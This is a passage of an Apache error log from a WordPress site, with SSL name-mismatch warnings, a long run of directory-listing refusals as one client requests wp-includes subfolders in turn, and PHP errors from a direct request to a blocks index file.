03:36:38.813295 2024] [ssl:warn] [pid 23858:tid 140071244744576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Oct 30 03:36:40.673362 2024] [ssl:warn] [pid 23858:tid 140071244744576] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Oct 30 03:36:42.954407 2024] [ssl:warn] [pid 24281:tid 139888672552832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Oct 30 03:36:43.186938 2024] [ssl:warn] [pid 24282:tid 139888672552832] AH01909: investigacionperu.com:443:0 server certificate does NOT include an ID which matches the server name [Wed Oct 30 15:16:44.983453 2024] [autoindex:error] [pid 24861:tid 139888242398976] [client 87.120.127.64:59940] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:16:54.572326 2024] [autoindex:error] [pid 24861:tid 139888217220864] [client 87.120.127.64:59954] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/ID3/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:17:04.600136 2024] [autoindex:error] [pid 24302:tid 139888275969792] [client 87.120.127.64:59962] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/IXR/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:17:07.851200 2024] [autoindex:error] [pid 24303:tid 139888473020160] [client 87.120.127.64:59968] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/PHPMailer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:17:18.837371 2024] [autoindex:error] [pid 24861:tid 139888259184384] [client 87.120.127.64:59976] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:17:28.554646 2024] [autoindex:error] [pid 24303:tid 139888439449344] [client 87.120.127.64:59984] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Auth/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:17:33.475470 2024] [autoindex:error] [pid 24302:tid 139888334718720] [client 87.120.127.64:59992] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Cookie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:17:37.521774 2024] [autoindex:error] [pid 24861:tid 139888267577088] [client 87.120.127.64:60004] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:17:39.322561 2024] [autoindex:error] [pid 24861:tid 139888464627456] [client 87.120.127.64:60008] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:17:48.274933 2024] [autoindex:error] [pid 24861:tid 139888309540608] [client 87.120.127.64:60012] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Exception/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:17:53.895040 2024] [autoindex:error] [pid 24303:tid 139888242398976] [client 87.120.127.64:60022] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Proxy/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:17:55.659233 2024] [autoindex:error] [pid 24302:tid 139888481412864] [client 87.120.127.64:60026] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Response/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:17:59.750713 2024] [autoindex:error] [pid 24302:tid 139888250791680] [client 87.120.127.64:60030] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Transport/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:02.514906 2024] [autoindex:error] [pid 24302:tid 139888447842048] [client 87.120.127.64:60034] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Requests/Utility/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:06.597142 2024] [autoindex:error] [pid 24302:tid 139888326326016] [client 87.120.127.64:60038] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:15.568554 2024] [autoindex:error] [pid 24303:tid 139888267577088] [client 87.120.127.64:60042] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Cache/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:20.067763 2024] [autoindex:error] [pid 24302:tid 139888439449344] [client 87.120.127.64:60046] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Content/Type/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:21.931485 2024] [autoindex:error] [pid 24304:tid 139888326326016] [client 87.120.127.64:60050] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Decode/HTML/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:27.338755 2024] [autoindex:error] [pid 24861:tid 139888334718720] [client 87.120.127.64:60056] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/HTTP/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:29.360893 2024] [autoindex:error] [pid 24861:tid 139888317933312] [client 87.120.127.64:60060] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Net/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:31.705724 2024] [autoindex:error] [pid 24861:tid 139888217220864] [client 87.120.127.64:60066] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/Parse/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:34.353752 2024] [autoindex:error] [pid 24861:tid 139888250791680] [client 87.120.127.64:60070] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/SimplePie/XML/Declaration/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:41.109022 2024] [autoindex:error] [pid 24303:tid 139888301147904] [client 87.120.127.64:60074] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:44.726640 2024] [autoindex:error] [pid 24304:tid 139888242398976] [client 87.120.127.64:60078] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:47.550669 2024] [autoindex:error] [pid 24302:tid 139888464627456] [client 87.120.127.64:60082] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Engine/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:18:55.632549 2024] [autoindex:error] [pid 24303:tid 139888343111424] [client 87.120.127.64:60090] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/Text/Diff/Renderer/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:00.818537 2024] [autoindex:error] [pid 24303:tid 139888464627456] [client 87.120.127.64:60094] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/assets/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:04.378526 2024] [autoindex:error] [pid 24861:tid 139888259184384] [client 87.120.127.64:60098] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-patterns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:07.928614 2024] [autoindex:error] [pid 24303:tid 139888489805568] [client 87.120.127.64:60102] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/block-supports/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:11.524269 2024] [:error] [pid 24303:tid 139888275969792] [client 87.120.127.64:60104] PHP Warning: Use of undefined constant ABSPATH - assumed 'ABSPATH' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Wed Oct 30 15:19:11.524537 2024] [:error] [pid 24303:tid 139888275969792] [client 87.120.127.64:60104] PHP Warning: Use of undefined constant WPINC - assumed 'WPINC' (this will throw an Error in a future version of PHP) in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Wed Oct 30 15:19:11.524780 2024] [:error] [pid 24303:tid 139888275969792] [client 87.120.127.64:60104] PHP Warning: require(ABSPATHWPINC/blocks/archives.php): failed to open stream: No such file or directory in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Wed Oct 30 15:19:11.524990 2024] [:error] [pid 24303:tid 139888275969792] [client 87.120.127.64:60104] PHP Fatal error: require(): Failed opening required 'ABSPATHWPINC/blocks/archives.php' (include_path='.:/usr/local/lib/php') in /home/investig/public_html/wp-includes/blocks/index.php on line 9 [Wed Oct 30 15:19:15.388760 2024] [autoindex:error] [pid 24303:tid 139888309540608] [client 87.120.127.64:60112] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/archives/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:17.549153 2024] [autoindex:error] [pid 24303:tid 139888225613568] [client 87.120.127.64:60116] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:20.397196 2024] [autoindex:error] [pid 24302:tid 139888284362496] [client 87.120.127.64:60122] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/block/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:25.481829 2024] [autoindex:error] [pid 24861:tid 139888464627456] [client 87.120.127.64:60128] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/button/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:31.110115 2024] [autoindex:error] [pid 24304:tid 139888292755200] [client 87.120.127.64:60132] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:33.411107 2024] [autoindex:error] [pid 24304:tid 139888267577088] [client 87.120.127.64:60136] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/calendar/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:38.558478 2024] [autoindex:error] [pid 24861:tid 139888481412864] [client 87.120.127.64:60140] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/categories/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:42.454124 2024] [autoindex:error] [pid 24861:tid 139888351504128] [client 87.120.127.64:60144] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/code/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:43.975498 2024] [autoindex:error] [pid 24861:tid 139888217220864] [client 87.120.127.64:60150] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/column/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:45.755273 2024] [autoindex:error] [pid 24303:tid 139888359896832] [client 87.120.127.64:60158] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/columns/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:51.424347 2024] [autoindex:error] [pid 24303:tid 139888456234752] [client 87.120.127.64:60162] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/cover/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:19:57.923073 2024] [autoindex:error] [pid 24302:tid 139888242398976] [client 87.120.127.64:60172] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/embed/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:20:01.405456 2024] [autoindex:error] [pid 24302:tid 139888317933312] [client 87.120.127.64:60176] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/file/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:20:05.302904 2024] [autoindex:error] [pid 24861:tid 139888447842048] [client 87.120.127.64:60180] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/freeform/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:20:14.396481 2024] [autoindex:error] [pid 24303:tid 139888317933312] [client 87.120.127.64:60188] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/gallery/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:20:19.892708 2024] [autoindex:error] [pid 24303:tid 139888292755200] [client 87.120.127.64:60194] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/group/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:20:23.910887 2024] [autoindex:error] [pid 24303:tid 139888439449344] [client 87.120.127.64:60202] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/heading/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:20:34.797119 2024] [autoindex:error] [pid 24861:tid 139888464627456] [client 87.120.127.64:60216] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/html/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:20:42.297810 2024] [autoindex:error] [pid 24302:tid 139888259184384] [client 87.120.127.64:60220] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/image/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:20:57.149705 2024] [autoindex:error] [pid 24861:tid 139888481412864] [client 87.120.127.64:60236] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/latest-comments/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:01.242729 2024] [autoindex:error] [pid 24304:tid 139888326326016] [client 87.120.127.64:60240] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/latest-posts/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:07.774866 2024] [autoindex:error] [pid 24861:tid 139888334718720] [client 87.120.127.64:60244] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/legacy-widget/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:11.308561 2024] [autoindex:error] [pid 24303:tid 139888217220864] [client 87.120.127.64:60250] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/list/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:13.274775 2024] [autoindex:error] [pid 24303:tid 139888301147904] [client 87.120.127.64:60254] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/loginout/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:16.777728 2024] [autoindex:error] [pid 24303:tid 139888447842048] [client 87.120.127.64:60258] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/media-text/: No matching DirectoryIndex (index.php,index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive [Wed Oct 30 15:21:20.237769 2024] [autoindex:error] [pid 24303:tid 139888343111424] [client 87.120.127.64:60262] AH01276: Cannot serve directory /home/investig/public_html/wp-includes/blocks/missing/: No matching DirectoryIndex 